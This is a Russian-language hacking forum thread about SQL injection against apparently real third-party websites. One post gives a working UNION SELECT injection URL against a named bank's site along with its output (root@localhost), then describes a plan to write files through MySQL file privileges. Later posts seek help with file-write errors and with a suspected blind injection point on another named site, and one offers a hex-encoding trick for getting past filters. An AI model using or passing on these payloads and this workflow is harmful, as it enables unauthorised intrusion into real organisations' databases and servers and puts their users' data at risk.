или же просто используете php функцию =)

echo "0x".bin2hex("что надо захекстить");

1. Есть туча сайтов, которые хексят.
2. Вы вообще ссылку смотрели?
3. Есть табла mysql.user.. но...

MirA
Забавно, действительно фильтрация "_"
Есть очень большая вероятность того, что user под которым работает база, file_priv=Y
http://www.rncb.ru/print_view.php?id=450&fpath=-2+union+select+1,2,3,UNHEX(HEX(user())),5,6,7,8,9, 10,11,12,13+from+mysql.user+--+
root@localhost

Прочитать файлы мы не сможем, т.к LOAD_FILE, и посмотреть тоже , т.к file_priv, а вот записать ...

Тоесть ищем папку на запись, и пробуем

PS
prescott,wildshaman Зачем вообще это писать?

Скажите что за ошибка 1 - Can't create/write to file '/home/localhost/www/1.txt' (Errcode: 2)
з.ы. в гугл не посылать,парсил)

"Errcode 2" означает, что папка не существует.

Путь сам что-ли придумывал? ^^

нет прав на запись или путь не правильный

Нет прав - это "Errcode: 13"

Помогите пожалуйста разобраться, вот нашел иньекцию http://www.rfrap.ru/site/index.php?p=16;'
при попытке подобрать количество полей вылезает
подозреваю, что это 3 версия мускуля и похоже blind SQL-injection, а так вообще хз, просто я никогда не встречался с этим....

че за фигня?) в httpd.conf прописано DocumentRoot "/usr/local/apache/htdocs"
а в /usr/local/apache/htdocs файлы index.html на разных языках и папка manual. походу это от установки апача но самого сайта нет(( как так?)